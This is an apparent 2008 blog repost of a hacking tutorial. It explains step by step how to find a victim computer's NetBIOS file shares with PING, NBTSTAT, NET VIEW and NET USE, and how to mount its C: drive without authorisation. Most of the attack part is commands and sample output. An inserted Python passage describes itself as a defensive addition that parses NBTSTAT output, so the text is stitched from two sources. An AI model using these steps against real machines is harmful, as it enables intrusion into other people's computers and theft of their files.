How to hack with NetBIOS

Q: What is NetBIOS?
A: NetBIOS stands for “Network Basic Input Output System”
and is a way for computers in a network (LAN or WAN)
to share files and printers. (It has many other uses as well, but they are
beyond the scope of this tutorial.)

Q: How is this interesting to me?
A: As you now know, it is used to share files.
This can be exploited. Many people share their entire
hard-drive without even knowing it. Most of the time,
these “shares” will not be password protected.

Q: Can I access these files from my own computer, you mean?
A: Sure. That is what this tutorial is all about.

Q: How?
A: If you have Windows installed, you already have all the
tools you need to access remote shares.

Q: Can you show me?
A: Sure.
================================================================
C:\windows>    <—this is what your terminal looks like when you
initiate the attack.

I could start talking about finding IPs too, but that would be off topic,
so you are going to have to read another tutorial on that if you don’t know
it.
Let’s just say the victim’s IP is 123.123.123.123.

Now… let’s make sure the host is there.

C:\windows>PING 123.123.123.123

What you want to see then is:

Reply from 123.123.123.123: bytes=32 time<1ms TTL=128

WE NOW KNOW TARGET IS ONLINE.
—————————————————————–
Next step is to see if target is sharing anything:

C:\windows>NBTSTAT -a 123.123.123.123

Name               Type         Status
———————————————
L337           <00>  UNIQUE      Registered
NSDAP          <00>  GROUP       Registered
L337           <03>  UNIQUE      Registered
L337           <20>  UNIQUE      Registered
NSDAP          <1E>  GROUP       Registered
STEALTHWASP    <03>  UNIQUE      Registered
NSDAP          <1D>  UNIQUE      Registered

What does this tell us?
L337 is the computer name.
NSDAP is the name of the workgroup.
STEALTHWASP is the currently logged in user.

BUT there is some even more valuable information there.
Do you see the <20> on the 4th line? That means the victim has file sharing
enabled.
If there was no <20> there, we could just forget doing the NetBIOS exploit
on this target.
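
Read from the defender's side, the same table shows what a host discloses to anyone who can query it. The following Python sketch is an added example, not part of the original tutorial: it parses NBTSTAT -a output captured from your own machines and reports the computer name, the workgroup and whether the <20> file server name is registered. The function names and the embedded sample (the table above, retyped) are constructed for illustration.

```python
import re

# Well-known NetBIOS name suffixes that appear in the table above.
SUFFIXES = {
    (0x00, "UNIQUE"): "Workstation service (computer name)",
    (0x00, "GROUP"): "Workgroup or domain name",
    (0x03, "UNIQUE"): "Messenger service (computer or user name)",
    (0x20, "UNIQUE"): "File Server service (file sharing enabled)",
    (0x1D, "UNIQUE"): "Master browser",
    (0x1E, "GROUP"): "Browser service elections",
}
ROW = re.compile(r"^\s*(\S+)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")

# Constructed sample input: the name table from the tutorial.
SAMPLE = """\
Name               Type         Status
---------------------------------------------
L337           <00>  UNIQUE      Registered
NSDAP          <00>  GROUP       Registered
L337           <03>  UNIQUE      Registered
L337           <20>  UNIQUE      Registered
NSDAP          <1E>  GROUP       Registered
STEALTHWASP    <03>  UNIQUE      Registered
NSDAP          <1D>  UNIQUE      Registered
"""

def parse_name_table(text):
    """Return (name, suffix, type, status) for every name-table row."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            name, suffix, kind, status = m.groups()
            rows.append((name, int(suffix, 16), kind.upper(), status))
    return rows

def audit(text):
    """Summarise what one host's name table discloses."""
    report = {"computer": None, "workgroup": None, "file_sharing": False, "roles": []}
    for name, suffix, kind, status in parse_name_table(text):
        report["roles"].append((name, SUFFIXES.get((suffix, kind), "other")))
        if (suffix, kind) == (0x00, "UNIQUE"):
            report["computer"] = name
        elif (suffix, kind) == (0x00, "GROUP"):
            report["workgroup"] = name
        elif suffix == 0x20 and status == "Registered":
            report["file_sharing"] = True
    return report

if __name__ == "__main__":
    for key, value in audit(SAMPLE).items():
        print(key, "=", value)
```

A host that reports file_sharing as True is one whose shares should be checked for password protection.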
—————————————————————–
Next step is to see the shares, if any. This may still be a dead end.

C:\windows>NET VIEW \\123.123.123.123
Shared resources on 123.123.123.123

Share name            Type          Comment

——————————————–
C                     Disk
D                     Disk
Command completed successfully.

NOW WE KNOW THE SHARE-NAMES.
—————————————————————–
All that remains now is to “MAP” a share…

C:\windows>NET USE K: \\123.123.123.123\C
Command completed successfully.

CHANGE TO K: IN DOS OR OPEN WINDOWS EXPLORER, AND YOU’RE IN…
==========================================================================================

Commands used in this tutorial:
PING
NBTSTAT -a IP (123.123.123.123)
NET VIEW \\IP
NET USE K: \\IP\SHARENAME

http://www.datastronghold.com/security-articles/hacking-articles/netbios-hacking-by-stealthwasp.html

~ by empa7hy on July 7, 2008.
